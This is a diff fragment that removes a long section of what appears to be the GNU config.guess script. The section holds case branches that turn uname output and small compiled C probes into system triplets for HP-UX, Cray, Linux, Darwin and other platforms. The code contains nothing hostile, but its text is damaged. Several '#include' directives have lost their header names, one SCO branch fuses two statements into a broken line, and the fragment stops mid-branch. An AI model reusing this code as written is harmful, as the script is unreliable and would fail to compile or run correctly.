-			  32) HP_ARCH=hppa2.0n ;;
-			  64) HP_ARCH=hppa2.0w ;;
-			  '') HP_ARCH=hppa2.0 ;;   # HP-UX 10.20
-			esac ;;
-		    esac
-		fi
-		if test "$HP_ARCH" = ""; then
-		    set_cc_for_build
-		    sed 's/^		//' << EOF > "$dummy.c"
-
-		#define _HPUX_SOURCE
-		#include 
-		#include 
-
-		int main ()
-		{
-		#if defined(_SC_KERNEL_BITS)
-		    long bits = sysconf(_SC_KERNEL_BITS);
-		#endif
-		    long cpu  = sysconf (_SC_CPU_VERSION);
-
-		    switch (cpu)
-			{
-			case CPU_PA_RISC1_0: puts ("hppa1.0"); break;
-			case CPU_PA_RISC1_1: puts ("hppa1.1"); break;
-			case CPU_PA_RISC2_0:
-		#if defined(_SC_KERNEL_BITS)
-			    switch (bits)
-				{
-				case 64: puts ("hppa2.0w"); break;
-				case 32: puts ("hppa2.0n"); break;
-				default: puts ("hppa2.0"); break;
-				} break;
-		#else  /* !defined(_SC_KERNEL_BITS) */
-			    puts ("hppa2.0"); break;
-		#endif
-			default: puts ("hppa1.0"); break;
-			}
-		    exit (0);
-		}
-EOF
-		    (CCOPTS="" $CC_FOR_BUILD -o "$dummy" "$dummy.c" 2>/dev/null) && HP_ARCH=$("$dummy")
-		    test -z "$HP_ARCH" && HP_ARCH=hppa
-		fi ;;
-	esac
-	if test "$HP_ARCH" = hppa2.0w
-	then
-	    set_cc_for_build
-
-	    # hppa2.0w-hp-hpux* has a 64-bit kernel and a compiler generating
-	    # 32-bit code.  hppa64-hp-hpux* has the same kernel and a compiler
-	    # generating 64-bit code.  GNU and HP use different nomenclature:
-	    #
-	    # $ CC_FOR_BUILD=cc ./config.guess
-	    # => hppa2.0w-hp-hpux11.23
-	    # $ CC_FOR_BUILD="cc +DA2.0w" ./config.guess
-	    # => hppa64-hp-hpux11.23
-
-	    if echo __LP64__ | (CCOPTS="" $CC_FOR_BUILD -E - 2>/dev/null) |
-		grep -q __LP64__
-	    then
-		HP_ARCH=hppa2.0w
-	    else
-		HP_ARCH=hppa64
-	    fi
-	fi
-	echo "$HP_ARCH"-hp-hpux"$HPUX_REV"
-	exit ;;
-    ia64:HP-UX:*:*)
-	HPUX_REV=$(echo "$UNAME_RELEASE"|sed -e 's/[^.]*.[0B]*//')
-	echo ia64-hp-hpux"$HPUX_REV"
-	exit ;;
-    3050*:HI-UX:*:*)
-	set_cc_for_build
-	sed 's/^	//' << EOF > "$dummy.c"
-	#include 
-	int
-	main ()
-	{
-	  long cpu = sysconf (_SC_CPU_VERSION);
-	  /* The order matters, because CPU_IS_HP_MC68K erroneously returns
-	     true for CPU_PA_RISC1_0.  CPU_IS_PA_RISC returns correct
-	     results, however.  */
-	  if (CPU_IS_PA_RISC (cpu))
-	    {
-	      switch (cpu)
-		{
-		  case CPU_PA_RISC1_0: puts ("hppa1.0-hitachi-hiuxwe2"); break;
-		  case CPU_PA_RISC1_1: puts ("hppa1.1-hitachi-hiuxwe2"); break;
-		  case CPU_PA_RISC2_0: puts ("hppa2.0-hitachi-hiuxwe2"); break;
-		  default: puts ("hppa-hitachi-hiuxwe2"); break;
-		}
-	    }
-	  else if (CPU_IS_HP_MC68K (cpu))
-	    puts ("m68k-hitachi-hiuxwe2");
-	  else puts ("unknown-hitachi-hiuxwe2");
-	  exit (0);
-	}
-EOF
-	$CC_FOR_BUILD -o "$dummy" "$dummy.c" && SYSTEM_NAME=$("$dummy") &&
-		{ echo "$SYSTEM_NAME"; exit; }
-	echo unknown-hitachi-hiuxwe2
-	exit ;;
-    9000/7??:4.3bsd:*:* | 9000/8?[79]:4.3bsd:*:*)
-	echo hppa1.1-hp-bsd
-	exit ;;
-    9000/8??:4.3bsd:*:*)
-	echo hppa1.0-hp-bsd
-	exit ;;
-    *9??*:MPE/iX:*:* | *3000*:MPE/iX:*:*)
-	echo hppa1.0-hp-mpeix
-	exit ;;
-    hp7??:OSF1:*:* | hp8?[79]:OSF1:*:*)
-	echo hppa1.1-hp-osf
-	exit ;;
-    hp8??:OSF1:*:*)
-	echo hppa1.0-hp-osf
-	exit ;;
-    i*86:OSF1:*:*)
-	if test -x /usr/sbin/sysversion ; then
-	    echo "$UNAME_MACHINE"-unknown-osf1mk
-	else
-	    echo "$UNAME_MACHINE"-unknown-osf1
-	fi
-	exit ;;
-    parisc*:Lites*:*:*)
-	echo hppa1.1-hp-lites
-	exit ;;
-    C1*:ConvexOS:*:* | convex:ConvexOS:C1*:*)
-	echo c1-convex-bsd
-	exit ;;
-    C2*:ConvexOS:*:* | convex:ConvexOS:C2*:*)
-	if getsysinfo -f scalar_acc
-	then echo c32-convex-bsd
-	else echo c2-convex-bsd
-	fi
-	exit ;;
-    C34*:ConvexOS:*:* | convex:ConvexOS:C34*:*)
-	echo c34-convex-bsd
-	exit ;;
-    C38*:ConvexOS:*:* | convex:ConvexOS:C38*:*)
-	echo c38-convex-bsd
-	exit ;;
-    C4*:ConvexOS:*:* | convex:ConvexOS:C4*:*)
-	echo c4-convex-bsd
-	exit ;;
-    CRAY*Y-MP:*:*:*)
-	echo ymp-cray-unicos"$UNAME_RELEASE" | sed -e 's/\.[^.]*$/.X/'
-	exit ;;
-    CRAY*[A-Z]90:*:*:*)
-	echo "$UNAME_MACHINE"-cray-unicos"$UNAME_RELEASE" \
-	| sed -e 's/CRAY.*\([A-Z]90\)/\1/' \
-	      -e y/ABCDEFGHIJKLMNOPQRSTUVWXYZ/abcdefghijklmnopqrstuvwxyz/ \
-	      -e 's/\.[^.]*$/.X/'
-	exit ;;
-    CRAY*TS:*:*:*)
-	echo t90-cray-unicos"$UNAME_RELEASE" | sed -e 's/\.[^.]*$/.X/'
-	exit ;;
-    CRAY*T3E:*:*:*)
-	echo alphaev5-cray-unicosmk"$UNAME_RELEASE" | sed -e 's/\.[^.]*$/.X/'
-	exit ;;
-    CRAY*SV1:*:*:*)
-	echo sv1-cray-unicos"$UNAME_RELEASE" | sed -e 's/\.[^.]*$/.X/'
-	exit ;;
-    *:UNICOS/mp:*:*)
-	echo craynv-cray-unicosmp"$UNAME_RELEASE" | sed -e 's/\.[^.]*$/.X/'
-	exit ;;
-    F30[01]:UNIX_System_V:*:* | F700:UNIX_System_V:*:*)
-	FUJITSU_PROC=$(uname -m | tr ABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyz)
-	FUJITSU_SYS=$(uname -p | tr ABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyz | sed -e 's/\///')
-	FUJITSU_REL=$(echo "$UNAME_RELEASE" | sed -e 's/ /_/')
-	echo "${FUJITSU_PROC}-fujitsu-${FUJITSU_SYS}${FUJITSU_REL}"
-	exit ;;
-    5000:UNIX_System_V:4.*:*)
-	FUJITSU_SYS=$(uname -p | tr ABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyz | sed -e 's/\///')
-	FUJITSU_REL=$(echo "$UNAME_RELEASE" | tr ABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyz | sed -e 's/ /_/')
-	echo "sparc-fujitsu-${FUJITSU_SYS}${FUJITSU_REL}"
-	exit ;;
-    i*86:BSD/386:*:* | i*86:BSD/OS:*:* | *:Ascend\ Embedded/OS:*:*)
-	echo "$UNAME_MACHINE"-pc-bsdi"$UNAME_RELEASE"
-	exit ;;
-    sparc*:BSD/OS:*:*)
-	echo sparc-unknown-bsdi"$UNAME_RELEASE"
-	exit ;;
-    *:BSD/OS:*:*)
-	echo "$UNAME_MACHINE"-unknown-bsdi"$UNAME_RELEASE"
-	exit ;;
-    arm:FreeBSD:*:*)
-	UNAME_PROCESSOR=$(uname -p)
-	set_cc_for_build
-	if echo __ARM_PCS_VFP | $CC_FOR_BUILD -E - 2>/dev/null \
-	    | grep -q __ARM_PCS_VFP
-	then
-	    echo "${UNAME_PROCESSOR}"-unknown-freebsd"$(echo ${UNAME_RELEASE}|sed -e 's/[-(].*//')"-gnueabi
-	else
-	    echo "${UNAME_PROCESSOR}"-unknown-freebsd"$(echo ${UNAME_RELEASE}|sed -e 's/[-(].*//')"-gnueabihf
-	fi
-	exit ;;
-    *:FreeBSD:*:*)
-	UNAME_PROCESSOR=$(/usr/bin/uname -p)
-	case "$UNAME_PROCESSOR" in
-	    amd64)
-		UNAME_PROCESSOR=x86_64 ;;
-	    i386)
-		UNAME_PROCESSOR=i586 ;;
-	esac
-	echo "$UNAME_PROCESSOR"-unknown-freebsd"$(echo "$UNAME_RELEASE"|sed -e 's/[-(].*//')"
-	exit ;;
-    i*:CYGWIN*:*)
-	echo "$UNAME_MACHINE"-pc-cygwin
-	exit ;;
-    *:MINGW64*:*)
-	echo "$UNAME_MACHINE"-pc-mingw64
-	exit ;;
-    *:MINGW*:*)
-	echo "$UNAME_MACHINE"-pc-mingw32
-	exit ;;
-    *:MSYS*:*)
-	echo "$UNAME_MACHINE"-pc-msys
-	exit ;;
-    i*:PW*:*)
-	echo "$UNAME_MACHINE"-pc-pw32
-	exit ;;
-    *:Interix*:*)
-	case "$UNAME_MACHINE" in
-	    x86)
-		echo i586-pc-interix"$UNAME_RELEASE"
-		exit ;;
-	    authenticamd | genuineintel | EM64T)
-		echo x86_64-unknown-interix"$UNAME_RELEASE"
-		exit ;;
-	    IA64)
-		echo ia64-unknown-interix"$UNAME_RELEASE"
-		exit ;;
-	esac ;;
-    i*:UWIN*:*)
-	echo "$UNAME_MACHINE"-pc-uwin
-	exit ;;
-    amd64:CYGWIN*:*:* | x86_64:CYGWIN*:*:*)
-	echo x86_64-pc-cygwin
-	exit ;;
-    prep*:SunOS:5.*:*)
-	echo powerpcle-unknown-solaris2"$(echo "$UNAME_RELEASE"|sed -e 's/[^.]*//')"
-	exit ;;
-    *:GNU:*:*)
-	# the GNU system
-	echo "$(echo "$UNAME_MACHINE"|sed -e 's,[-/].*$,,')-unknown-$LIBC$(echo "$UNAME_RELEASE"|sed -e 's,/.*$,,')"
-	exit ;;
-    *:GNU/*:*:*)
-	# other systems with GNU libc and userland
-	echo "$UNAME_MACHINE-unknown-$(echo "$UNAME_SYSTEM" | sed 's,^[^/]*/,,' | tr "[:upper:]" "[:lower:]")$(echo "$UNAME_RELEASE"|sed -e 's/[-(].*//')-$LIBC"
-	exit ;;
-    *:Minix:*:*)
-	echo "$UNAME_MACHINE"-unknown-minix
-	exit ;;
-    aarch64:Linux:*:*)
-	echo "$UNAME_MACHINE"-unknown-linux-"$LIBC"
-	exit ;;
-    aarch64_be:Linux:*:*)
-	UNAME_MACHINE=aarch64_be
-	echo "$UNAME_MACHINE"-unknown-linux-"$LIBC"
-	exit ;;
-    alpha:Linux:*:*)
-	case $(sed -n '/^cpu model/s/^.*: \(.*\)/\1/p' /proc/cpuinfo 2>/dev/null) in
-	  EV5)   UNAME_MACHINE=alphaev5 ;;
-	  EV56)  UNAME_MACHINE=alphaev56 ;;
-	  PCA56) UNAME_MACHINE=alphapca56 ;;
-	  PCA57) UNAME_MACHINE=alphapca56 ;;
-	  EV6)   UNAME_MACHINE=alphaev6 ;;
-	  EV67)  UNAME_MACHINE=alphaev67 ;;
-	  EV68*) UNAME_MACHINE=alphaev68 ;;
-	esac
-	objdump --private-headers /bin/sh | grep -q ld.so.1
-	if test "$?" = 0 ; then LIBC=gnulibc1 ; fi
-	echo "$UNAME_MACHINE"-unknown-linux-"$LIBC"
-	exit ;;
-    arc:Linux:*:* | arceb:Linux:*:*)
-	echo "$UNAME_MACHINE"-unknown-linux-"$LIBC"
-	exit ;;
-    arm*:Linux:*:*)
-	set_cc_for_build
-	if echo __ARM_EABI__ | $CC_FOR_BUILD -E - 2>/dev/null \
-	    | grep -q __ARM_EABI__
-	then
-	    echo "$UNAME_MACHINE"-unknown-linux-"$LIBC"
-	else
-	    if echo __ARM_PCS_VFP | $CC_FOR_BUILD -E - 2>/dev/null \
-		| grep -q __ARM_PCS_VFP
-	    then
-		echo "$UNAME_MACHINE"-unknown-linux-"$LIBC"eabi
-	    else
-		echo "$UNAME_MACHINE"-unknown-linux-"$LIBC"eabihf
-	    fi
-	fi
-	exit ;;
-    avr32*:Linux:*:*)
-	echo "$UNAME_MACHINE"-unknown-linux-"$LIBC"
-	exit ;;
-    cris:Linux:*:*)
-	echo "$UNAME_MACHINE"-axis-linux-"$LIBC"
-	exit ;;
-    crisv32:Linux:*:*)
-	echo "$UNAME_MACHINE"-axis-linux-"$LIBC"
-	exit ;;
-    e2k:Linux:*:*)
-	echo "$UNAME_MACHINE"-unknown-linux-"$LIBC"
-	exit ;;
-    frv:Linux:*:*)
-	echo "$UNAME_MACHINE"-unknown-linux-"$LIBC"
-	exit ;;
-    hexagon:Linux:*:*)
-	echo "$UNAME_MACHINE"-unknown-linux-"$LIBC"
-	exit ;;
-    i*86:Linux:*:*)
-	echo "$UNAME_MACHINE"-pc-linux-"$LIBC"
-	exit ;;
-    ia64:Linux:*:*)
-	echo "$UNAME_MACHINE"-unknown-linux-"$LIBC"
-	exit ;;
-    k1om:Linux:*:*)
-	echo "$UNAME_MACHINE"-unknown-linux-"$LIBC"
-	exit ;;
-    loongarch32:Linux:*:* | loongarch64:Linux:*:* | loongarchx32:Linux:*:*)
-	echo "$UNAME_MACHINE"-unknown-linux-"$LIBC"
-	exit ;;
-    m32r*:Linux:*:*)
-	echo "$UNAME_MACHINE"-unknown-linux-"$LIBC"
-	exit ;;
-    m68*:Linux:*:*)
-	echo "$UNAME_MACHINE"-unknown-linux-"$LIBC"
-	exit ;;
-    mips:Linux:*:* | mips64:Linux:*:*)
-	set_cc_for_build
-	IS_GLIBC=0
-	test x"${LIBC}" = xgnu && IS_GLIBC=1
-	sed 's/^	//' << EOF > "$dummy.c"
-	#undef CPU
-	#undef mips
-	#undef mipsel
-	#undef mips64
-	#undef mips64el
-	#if ${IS_GLIBC} && defined(_ABI64)
-	LIBCABI=gnuabi64
-	#else
-	#if ${IS_GLIBC} && defined(_ABIN32)
-	LIBCABI=gnuabin32
-	#else
-	LIBCABI=${LIBC}
-	#endif
-	#endif
-
-	#if ${IS_GLIBC} && defined(__mips64) && defined(__mips_isa_rev) && __mips_isa_rev>=6
-	CPU=mipsisa64r6
-	#else
-	#if ${IS_GLIBC} && !defined(__mips64) && defined(__mips_isa_rev) && __mips_isa_rev>=6
-	CPU=mipsisa32r6
-	#else
-	#if defined(__mips64)
-	CPU=mips64
-	#else
-	CPU=mips
-	#endif
-	#endif
-	#endif
-
-	#if defined(__MIPSEL__) || defined(__MIPSEL) || defined(_MIPSEL) || defined(MIPSEL)
-	MIPS_ENDIAN=el
-	#else
-	#if defined(__MIPSEB__) || defined(__MIPSEB) || defined(_MIPSEB) || defined(MIPSEB)
-	MIPS_ENDIAN=
-	#else
-	MIPS_ENDIAN=
-	#endif
-	#endif
-EOF
-	eval "$($CC_FOR_BUILD -E "$dummy.c" 2>/dev/null | grep '^CPU\|^MIPS_ENDIAN\|^LIBCABI')"
-	test "x$CPU" != x && { echo "$CPU${MIPS_ENDIAN}-unknown-linux-$LIBCABI"; exit; }
-	;;
-    mips64el:Linux:*:*)
-	echo "$UNAME_MACHINE"-unknown-linux-"$LIBC"
-	exit ;;
-    openrisc*:Linux:*:*)
-	echo or1k-unknown-linux-"$LIBC"
-	exit ;;
-    or32:Linux:*:* | or1k*:Linux:*:*)
-	echo "$UNAME_MACHINE"-unknown-linux-"$LIBC"
-	exit ;;
-    padre:Linux:*:*)
-	echo sparc-unknown-linux-"$LIBC"
-	exit ;;
-    parisc64:Linux:*:* | hppa64:Linux:*:*)
-	echo hppa64-unknown-linux-"$LIBC"
-	exit ;;
-    parisc:Linux:*:* | hppa:Linux:*:*)
-	# Look for CPU level
-	case $(grep '^cpu[^a-z]*:' /proc/cpuinfo 2>/dev/null | cut -d' ' -f2) in
-	  PA7*) echo hppa1.1-unknown-linux-"$LIBC" ;;
-	  PA8*) echo hppa2.0-unknown-linux-"$LIBC" ;;
-	  *)    echo hppa-unknown-linux-"$LIBC" ;;
-	esac
-	exit ;;
-    ppc64:Linux:*:*)
-	echo powerpc64-unknown-linux-"$LIBC"
-	exit ;;
-    ppc:Linux:*:*)
-	echo powerpc-unknown-linux-"$LIBC"
-	exit ;;
-    ppc64le:Linux:*:*)
-	echo powerpc64le-unknown-linux-"$LIBC"
-	exit ;;
-    ppcle:Linux:*:*)
-	echo powerpcle-unknown-linux-"$LIBC"
-	exit ;;
-    riscv32:Linux:*:* | riscv32be:Linux:*:* | riscv64:Linux:*:* | riscv64be:Linux:*:*)
-	echo "$UNAME_MACHINE"-unknown-linux-"$LIBC"
-	exit ;;
-    s390:Linux:*:* | s390x:Linux:*:*)
-	echo "$UNAME_MACHINE"-ibm-linux-"$LIBC"
-	exit ;;
-    sh64*:Linux:*:*)
-	echo "$UNAME_MACHINE"-unknown-linux-"$LIBC"
-	exit ;;
-    sh*:Linux:*:*)
-	echo "$UNAME_MACHINE"-unknown-linux-"$LIBC"
-	exit ;;
-    sparc:Linux:*:* | sparc64:Linux:*:*)
-	echo "$UNAME_MACHINE"-unknown-linux-"$LIBC"
-	exit ;;
-    tile*:Linux:*:*)
-	echo "$UNAME_MACHINE"-unknown-linux-"$LIBC"
-	exit ;;
-    vax:Linux:*:*)
-	echo "$UNAME_MACHINE"-dec-linux-"$LIBC"
-	exit ;;
-    x86_64:Linux:*:*)
-	set_cc_for_build
-	LIBCABI=$LIBC
-	if test "$CC_FOR_BUILD" != no_compiler_found; then
-	    if (echo '#ifdef __ILP32__'; echo IS_X32; echo '#endif') | \
-		(CCOPTS="" $CC_FOR_BUILD -E - 2>/dev/null) | \
-		grep IS_X32 >/dev/null
-	    then
-		LIBCABI="$LIBC"x32
-	    fi
-	fi
-	echo "$UNAME_MACHINE"-pc-linux-"$LIBCABI"
-	exit ;;
-    xtensa*:Linux:*:*)
-	echo "$UNAME_MACHINE"-unknown-linux-"$LIBC"
-	exit ;;
-    i*86:DYNIX/ptx:4*:*)
-	# ptx 4.0 does uname -s correctly, with DYNIX/ptx in there.
-	# earlier versions are messed up and put the nodename in both
-	# sysname and nodename.
-	echo i386-sequent-sysv4
-	exit ;;
-    i*86:UNIX_SV:4.2MP:2.*)
-	# Unixware is an offshoot of SVR4, but it has its own version
-	# number series starting with 2...
-	# I am not positive that other SVR4 systems won't match this,
-	# I just have to hope.  -- rms.
-	# Use sysv4.2uw... so that sysv4* matches it.
-	echo "$UNAME_MACHINE"-pc-sysv4.2uw"$UNAME_VERSION"
-	exit ;;
-    i*86:OS/2:*:*)
-	# If we were able to find `uname', then EMX Unix compatibility
-	# is probably installed.
-	echo "$UNAME_MACHINE"-pc-os2-emx
-	exit ;;
-    i*86:XTS-300:*:STOP)
-	echo "$UNAME_MACHINE"-unknown-stop
-	exit ;;
-    i*86:atheos:*:*)
-	echo "$UNAME_MACHINE"-unknown-atheos
-	exit ;;
-    i*86:syllable:*:*)
-	echo "$UNAME_MACHINE"-pc-syllable
-	exit ;;
-    i*86:LynxOS:2.*:* | i*86:LynxOS:3.[01]*:* | i*86:LynxOS:4.[02]*:*)
-	echo i386-unknown-lynxos"$UNAME_RELEASE"
-	exit ;;
-    i*86:*DOS:*:*)
-	echo "$UNAME_MACHINE"-pc-msdosdjgpp
-	exit ;;
-    i*86:*:4.*:*)
-	UNAME_REL=$(echo "$UNAME_RELEASE" | sed 's/\/MP$//')
-	if grep Novell /usr/include/link.h >/dev/null 2>/dev/null; then
-		echo "$UNAME_MACHINE"-univel-sysv"$UNAME_REL"
-	else
-		echo "$UNAME_MACHINE"-pc-sysv"$UNAME_REL"
-	fi
-	exit ;;
-    i*86:*:5:[678]*)
-	# UnixWare 7.x, OpenUNIX and OpenServer 6.
-	case $(/bin/uname -X | grep "^Machine") in
-	    *486*)	     UNAME_MACHINE=i486 ;;
-	    *Pentium)	     UNAME_MACHINE=i586 ;;
-	    *Pent*|*Celeron) UNAME_MACHINE=i686 ;;
-	esac
-	echo "$UNAME_MACHINE-unknown-sysv${UNAME_RELEASE}${UNAME_SYSTEM}${UNAME_VERSION}"
-	exit ;;
-    i*86:*:3.2:*)
-	if test -f /usr/options/cb.name; then
-		UNAME_REL=$(sed -n 's/.*Version //p' /dev/null >/dev/null ; then
-		UNAME_REL=$( (/bin/uname -X|grep Release|sed -e 's/.*= //'))
-		(/bin/uname -X|grep i80486 >/dev/null) && UNAME_MACHINE=i486
-		(/bin/uname -X|grep '^Machine.*Pentium' >/dev/null) \
-			&& UNAME_MACHINE=i586
-		(/bin/uname -X|grep '^Machine.*Pent *II' >/dev/null) \
-			&& UNAME_MACHINE=i686
-		(/bin/uname -X|grep '^Machine.*Pentium Pro' >/dev/null) \
-			&& UNAME_MACHINE=i686
-		echo "$UNAME_MACHINE"-pc-sco"$UNAME_REL"
-	else
-		echo "$UNAME_MACHINE"-pc-sysv32
-	fi
-	exit ;;
-    pc:*:*:*)
-	# Left here for compatibility:
-	# uname -m prints for DJGPP always 'pc', but it prints nothing about
-	# the processor, so we play safe by assuming i586.
-	# Note: whatever this is, it MUST be the same as what config.sub
-	# prints for the "djgpp" host, or else GDB configure will decide that
-	# this is a cross-build.
-	echo i586-pc-msdosdjgpp
-	exit ;;
-    Intel:Mach:3*:*)
-	echo i386-pc-mach3
-	exit ;;
-    paragon:*:*:*)
-	echo i860-intel-osf1
-	exit ;;
-    i860:*:4.*:*) # i860-SVR4
-	if grep Stardent /usr/include/sys/uadmin.h >/dev/null 2>&1 ; then
-	  echo i860-stardent-sysv"$UNAME_RELEASE" # Stardent Vistra i860-SVR4
-	else # Add other i860-SVR4 vendors below as they are discovered.
-	  echo i860-unknown-sysv"$UNAME_RELEASE"  # Unknown i860-SVR4
-	fi
-	exit ;;
-    mini*:CTIX:SYS*5:*)
-	# "miniframe"
-	echo m68010-convergent-sysv
-	exit ;;
-    mc68k:UNIX:SYSTEM5:3.51m)
-	echo m68k-convergent-sysv
-	exit ;;
-    M680?0:D-NIX:5.3:*)
-	echo m68k-diab-dnix
-	exit ;;
-    M68*:*:R3V[5678]*:*)
-	test -r /sysV68 && { echo 'm68k-motorola-sysv'; exit; } ;;
-    3[345]??:*:4.0:3.0 | 3[34]??A:*:4.0:3.0 | 3[34]??,*:*:4.0:3.0 | 3[34]??/*:*:4.0:3.0 | 4400:*:4.0:3.0 | 4850:*:4.0:3.0 | SKA40:*:4.0:3.0 | SDS2:*:4.0:3.0 | SHG2:*:4.0:3.0 | S7501*:*:4.0:3.0)
-	OS_REL=''
-	test -r /etc/.relid \
-	&& OS_REL=.$(sed -n 's/[^ ]* [^ ]* \([0-9][0-9]\).*/\1/p' < /etc/.relid)
-	/bin/uname -p 2>/dev/null | grep 86 >/dev/null \
-	  && { echo i486-ncr-sysv4.3"$OS_REL"; exit; }
-	/bin/uname -p 2>/dev/null | /bin/grep entium >/dev/null \
-	  && { echo i586-ncr-sysv4.3"$OS_REL"; exit; } ;;
-    3[34]??:*:4.0:* | 3[34]??,*:*:4.0:*)
-	/bin/uname -p 2>/dev/null | grep 86 >/dev/null \
-	  && { echo i486-ncr-sysv4; exit; } ;;
-    NCR*:*:4.2:* | MPRAS*:*:4.2:*)
-	OS_REL='.3'
-	test -r /etc/.relid \
-	    && OS_REL=.$(sed -n 's/[^ ]* [^ ]* \([0-9][0-9]\).*/\1/p' < /etc/.relid)
-	/bin/uname -p 2>/dev/null | grep 86 >/dev/null \
-	    && { echo i486-ncr-sysv4.3"$OS_REL"; exit; }
-	/bin/uname -p 2>/dev/null | /bin/grep entium >/dev/null \
-	    && { echo i586-ncr-sysv4.3"$OS_REL"; exit; }
-	/bin/uname -p 2>/dev/null | /bin/grep pteron >/dev/null \
-	    && { echo i586-ncr-sysv4.3"$OS_REL"; exit; } ;;
-    m68*:LynxOS:2.*:* | m68*:LynxOS:3.0*:*)
-	echo m68k-unknown-lynxos"$UNAME_RELEASE"
-	exit ;;
-    mc68030:UNIX_System_V:4.*:*)
-	echo m68k-atari-sysv4
-	exit ;;
-    TSUNAMI:LynxOS:2.*:*)
-	echo sparc-unknown-lynxos"$UNAME_RELEASE"
-	exit ;;
-    rs6000:LynxOS:2.*:*)
-	echo rs6000-unknown-lynxos"$UNAME_RELEASE"
-	exit ;;
-    PowerPC:LynxOS:2.*:* | PowerPC:LynxOS:3.[01]*:* | PowerPC:LynxOS:4.[02]*:*)
-	echo powerpc-unknown-lynxos"$UNAME_RELEASE"
-	exit ;;
-    SM[BE]S:UNIX_SV:*:*)
-	echo mips-dde-sysv"$UNAME_RELEASE"
-	exit ;;
-    RM*:ReliantUNIX-*:*:*)
-	echo mips-sni-sysv4
-	exit ;;
-    RM*:SINIX-*:*:*)
-	echo mips-sni-sysv4
-	exit ;;
-    *:SINIX-*:*:*)
-	if uname -p 2>/dev/null >/dev/null ; then
-		UNAME_MACHINE=$( (uname -p) 2>/dev/null)
-		echo "$UNAME_MACHINE"-sni-sysv4
-	else
-		echo ns32k-sni-sysv
-	fi
-	exit ;;
-    PENTIUM:*:4.0*:*)	# Unisys `ClearPath HMP IX 4000' SVR4/MP effort
-			# says 
-	echo i586-unisys-sysv4
-	exit ;;
-    *:UNIX_System_V:4*:FTX*)
-	# From Gerald Hewes .
-	# How about differentiating between stratus architectures? -djm
-	echo hppa1.1-stratus-sysv4
-	exit ;;
-    *:*:*:FTX*)
-	# From seanf@swdc.stratus.com.
-	echo i860-stratus-sysv4
-	exit ;;
-    i*86:VOS:*:*)
-	# From Paul.Green@stratus.com.
-	echo "$UNAME_MACHINE"-stratus-vos
-	exit ;;
-    *:VOS:*:*)
-	# From Paul.Green@stratus.com.
-	echo hppa1.1-stratus-vos
-	exit ;;
-    mc68*:A/UX:*:*)
-	echo m68k-apple-aux"$UNAME_RELEASE"
-	exit ;;
-    news*:NEWS-OS:6*:*)
-	echo mips-sony-newsos6
-	exit ;;
-    R[34]000:*System_V*:*:* | R4000:UNIX_SYSV:*:* | R*000:UNIX_SV:*:*)
-	if test -d /usr/nec; then
-		echo mips-nec-sysv"$UNAME_RELEASE"
-	else
-		echo mips-unknown-sysv"$UNAME_RELEASE"
-	fi
-	exit ;;
-    BeBox:BeOS:*:*)	# BeOS running on hardware made by Be, PPC only.
-	echo powerpc-be-beos
-	exit ;;
-    BeMac:BeOS:*:*)	# BeOS running on Mac or Mac clone, PPC only.
-	echo powerpc-apple-beos
-	exit ;;
-    BePC:BeOS:*:*)	# BeOS running on Intel PC compatible.
-	echo i586-pc-beos
-	exit ;;
-    BePC:Haiku:*:*)	# Haiku running on Intel PC compatible.
-	echo i586-pc-haiku
-	exit ;;
-    x86_64:Haiku:*:*)
-	echo x86_64-unknown-haiku
-	exit ;;
-    SX-4:SUPER-UX:*:*)
-	echo sx4-nec-superux"$UNAME_RELEASE"
-	exit ;;
-    SX-5:SUPER-UX:*:*)
-	echo sx5-nec-superux"$UNAME_RELEASE"
-	exit ;;
-    SX-6:SUPER-UX:*:*)
-	echo sx6-nec-superux"$UNAME_RELEASE"
-	exit ;;
-    SX-7:SUPER-UX:*:*)
-	echo sx7-nec-superux"$UNAME_RELEASE"
-	exit ;;
-    SX-8:SUPER-UX:*:*)
-	echo sx8-nec-superux"$UNAME_RELEASE"
-	exit ;;
-    SX-8R:SUPER-UX:*:*)
-	echo sx8r-nec-superux"$UNAME_RELEASE"
-	exit ;;
-    SX-ACE:SUPER-UX:*:*)
-	echo sxace-nec-superux"$UNAME_RELEASE"
-	exit ;;
-    Power*:Rhapsody:*:*)
-	echo powerpc-apple-rhapsody"$UNAME_RELEASE"
-	exit ;;
-    *:Rhapsody:*:*)
-	echo "$UNAME_MACHINE"-apple-rhapsody"$UNAME_RELEASE"
-	exit ;;
-    arm64:Darwin:*:*)
-	echo aarch64-apple-darwin"$UNAME_RELEASE"
-	exit ;;
-    *:Darwin:*:*)
-	UNAME_PROCESSOR=$(uname -p)
-	case $UNAME_PROCESSOR in
-	    unknown) UNAME_PROCESSOR=powerpc ;;
-	esac
-	if command -v xcode-select > /dev/null 2> /dev/null && \
-		! xcode-select --print-path > /dev/null 2> /dev/null ; then
-	    # Avoid executing cc if there is no toolchain installed as
-	    # cc will be a stub that puts up a graphical alert
-	    # prompting the user to install developer tools.
-	    CC_FOR_BUILD=no_compiler_found
-	else
-	    set_cc_for_build
-	fi
-	if test "$CC_FOR_BUILD" != no_compiler_found; then
-	    if (echo '#ifdef __LP64__'; echo IS_64BIT_ARCH; echo '#endif') | \
-		   (CCOPTS="" $CC_FOR_BUILD -E - 2>/dev/null) | \
-		   grep IS_64BIT_ARCH >/dev/null
-	    then
-		case $UNAME_PROCESSOR in
-		    i386) UNAME_PROCESSOR=x86_64 ;;
-		    powerpc) UNAME_PROCESSOR=powerpc64 ;;
-		esac
-	    fi
-	    # On 10.4-10.6 one might compile for PowerPC via gcc -arch ppc
-	    if (echo '#ifdef __POWERPC__'; echo IS_PPC; echo '#endif') | \
-		   (CCOPTS="" $CC_FOR_BUILD -E - 2>/dev/null) | \
-		   grep IS_PPC >/dev/null
-	    then
-		UNAME_PROCESSOR=powerpc
-	    fi
-	elif test "$UNAME_PROCESSOR" = i386 ; then
-	    # uname -m returns i386 or x86_64
-	    UNAME_PROCESSOR=$UNAME_MACHINE
-	fi
-	echo "$UNAME_PROCESSOR"-apple-darwin"$UNAME_RELEASE"
-	exit ;;
-    *:procnto*:*:* | *:QNX:[0123456789]*:*)
-	UNAME_PROCESSOR=$(uname -p)
-	if test "$UNAME_PROCESSOR" = x86; then
-		UNAME_PROCESSOR=i386
-		UNAME_MACHINE=pc
-	fi
-	echo "$UNAME_PROCESSOR"-"$UNAME_MACHINE"-nto-qnx"$UNAME_RELEASE"
-	exit ;;
-    *:QNX:*:4*)
-	echo i386-pc-qnx
